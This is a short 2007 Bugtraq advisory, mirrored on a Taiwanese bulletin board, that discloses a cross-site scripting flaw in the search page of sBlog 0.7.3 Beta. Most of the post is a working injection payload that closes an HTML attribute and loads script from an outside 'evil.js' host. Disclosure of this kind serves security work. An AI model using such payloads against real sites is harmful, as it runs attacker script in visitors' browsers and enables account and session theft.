批踢踢實業坊
›
看板
Bugtraq
關於我們
聯絡資訊
返回看板
發信人
Guns@0x90.com.ar,
看板
Bugtraq
標 題
sBlog 0.7.3 Beta XSS Vulnerabilitie
發信站
NCTU CSIE FreeBSD Server (Sat Jul 28 08:19:42 2007)
轉信站
ptt!FreeBSD.csie.NCTU!not-for-mail
# sBlog 0.7.3 Beta XSS Vulnerabilitie # Found by 0x90 # www.0x90.com.ar # msn & mail: Guns@0x90.com.ar # in blog
http://host/blog/search.php
# use '"/></><script src=
http://yoursite.com/evil.js>
# Welcome to the jungle!